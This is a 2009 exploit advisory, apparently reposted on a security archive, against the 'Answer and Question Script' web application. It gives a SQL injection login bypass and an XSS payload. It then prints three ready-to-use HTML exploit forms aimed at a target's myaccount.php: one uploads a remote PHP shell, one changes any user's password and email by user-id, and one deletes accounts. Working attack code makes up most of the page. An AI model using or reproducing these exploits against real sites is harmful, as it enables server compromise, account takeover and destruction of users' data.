Easy Scripts Answer and Question Script Multiple Vulnerabilities

2009.05.18
Credit: Cyb3r-1sT
Risk: High
Local: No
Remote: Yes

|| || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | | /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | | \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | | \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | | \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | | \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | | \ \____/ >> Kings of injection | | \/___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| <<!>> Found by : Cyb3r-1sT <<!>> C0ntact : cyb3r-1st [at] hotmail.com <<!>> Groups : InjEctOr5 T3am ======================================================= +++++++++++++++++++ Script information+++++++++++++++++ ======================================================= <<->> script :: Answer and Question Script <<->> download :: ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++ ======================================================= <<->> Exploit :: ... bypass sql injection ... goto login section .. and put in user name ' or 1=1-- and in pass ' or 1=1-- ... XSS ... www.cyb3r.1st/ [path] / questiondetail.php?questionid="><script>alert(1)</script> ======================================================= ++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ ======================================================= <<->> All freinds , [ www.tryag.com ] , [ www.7rs.org ] , [ www.sec-code.com ] ###################################################################################################################### Upload Vulnerability ###################################################################################################################### <html dir="rtl"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Cyb3R-1sT</title> </head> <script language="javascript"> function frmCr() { document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php'; document.frmCrRegister.submit(); } </script> <form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();"> <body bgcolor="#000000"> <p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p> <p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ] hotmail.com</font></p> <p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p> <p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font> </p> <p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All freinds . M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font></p> <div align="center"> <p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p> <p dir="ltr"><font size="4" color="#008000">Answer and Question Script Remote Shell Upload Vulnerability</font></p> <table border="1" width="76%" bordercolorlight="#008080" bordercolordark="#006666"> <tr> <td> <p align="left">&nbsp;</p> <p align="left" dir="ltr"><font color="#FFFFFF">&nbsp; <font size="4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Site :&nbsp;&nbsp;&nbsp;&nbsp; <input name="siteurl" type="text" value="http://" size="40"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; User-id :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="text" name="userid" id="userid" value="" size="20" /><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Shell :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="file" name="txtphoto" id="txtphoto" value="Sunset.jpg" size="23" /></font></font><br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()">&nbsp;&nbsp;&nbsp;</p> <p align="center" dir="ltr"><font size="4" color="#808080">Note : ur shell will be here :- http://Cyb3R-1sT.com/uploads/user/shell.php</font></p> <p align="left" dir="ltr">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p> </td> </tr> </table> </div> </body> </html> ###################################################################################################################### Change Passwords ###################################################################################################################### <html dir="rtl"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Cyb3R-1sT</title> </head> <script language="javascript"> function frmCr() { document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php'; document.frmCrRegister.submit(); } </script> <form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();"> <body bgcolor="#000000"> <p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p> <p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ] hotmail.com</font></p> <p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p> <p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font> </p> <p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All freinds . M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font><font color="#808080" size="5"> </font></p> <p align="center">&nbsp;</p> <div align="center"> <p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p> <p dir="ltr"><font size="4" color="#008000">Answer and Question Script Remote User Options Changer Exploit</font></p> <table border="1" width="75%" bordercolorlight="#008080" bordercolordark="#006666"> <tr> <td> <p align="left">&nbsp;</p> <p align="left" dir="ltr"><font color="#FFFFFF">&nbsp; <font size="4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Site :&nbsp;&nbsp;&nbsp;&nbsp; <input name="siteurl" type="text" value="http://" size="40"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Username :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="text" name="txtusername" value="" size="20"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; User-id :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="text" name="userid" id="userid" value="" size="20" /><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Password :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="password" name="txtpassword" value="" size="20"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Re-Type Password :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="password" name="txtRpassword" value="" size="20"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E-Mail :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></font> <input name="txtmail" type="text" value="" size="36"><br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()">&nbsp;&nbsp;&nbsp;</p> <p align="left" dir="ltr">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p> </td> </tr> </table> </div> </body> </html> ###################################################################################################################### Remove Accounts ###################################################################################################################### <html dir="rtl"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Cyb3R-1sT</title> </head> <script language="javascript"> function frmCr() { document.frmCrRegister.action=document.frmCrRegister.siteurl.value+'/myaccount.php'; document.frmCrRegister.submit(); } </script> <form method="post" enctype="multipart/form-data" name="frmCrRegister" onSubmit="return frontcreateaccount();"> <head> <body bgcolor="#000000"> <p align="center"><b><font size="6" color="#996633">Cyb3R-1sT</font></b></p> <p align="center"><font color="#808000" size="4" face="Times New Roman">cyb3r-1st [at ] hotmail.com</font></p> <p align="center"><font size="5" color="#C0C0C0">Inject0r5 Team</font></p> <p dir="ltr" align="center"><font size="5" color="#808000">: Sp.Greetz : </font> </p> <p align="center" dir="ltr"><font color="#808080" style="font-size: 15pt">All freinds . M~Carezma . [ www.tryag.com ] . [ www.7rs.org ] . [ www.sec-code.com ]</font><font color="#808080" size="5">&nbsp; </font></p> <p align="center">&nbsp;</p> <div align="center"> <p dir="ltr"><font color="#333399" size="6">: Exploit :</font></p> <p dir="ltr"><font color="#008000" size="4">Answer and Question Script remove user Vulnerability</font></p> <table border="1" width="77%" bordercolorlight="#008080" bordercolordark="#006666"> <tr> <td> <p align="left">&nbsp;</p> <p align="left" dir="ltr"><font color="#FFFFFF">&nbsp; <font size="4">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Site :&nbsp;&nbsp;&nbsp;&nbsp; <input name="siteurl" type="text" value="http://" size="40"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; User-id :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="text" name="userid" id="userid" value="" size="20" /><br></font></font><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type="submit" name="cmdUpdate" id="cmdUpdate" value="Update" onclick="frmCr()">&nbsp;</p> <p align="left" dir="ltr">&nbsp;</p> </td> </tr> </table> </div> </body> </html>

References:

http://www.securityfocus.com/bid/34975
http://www.milw0rm.com/exploits/8690
http://secunia.com/advisories/35067


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top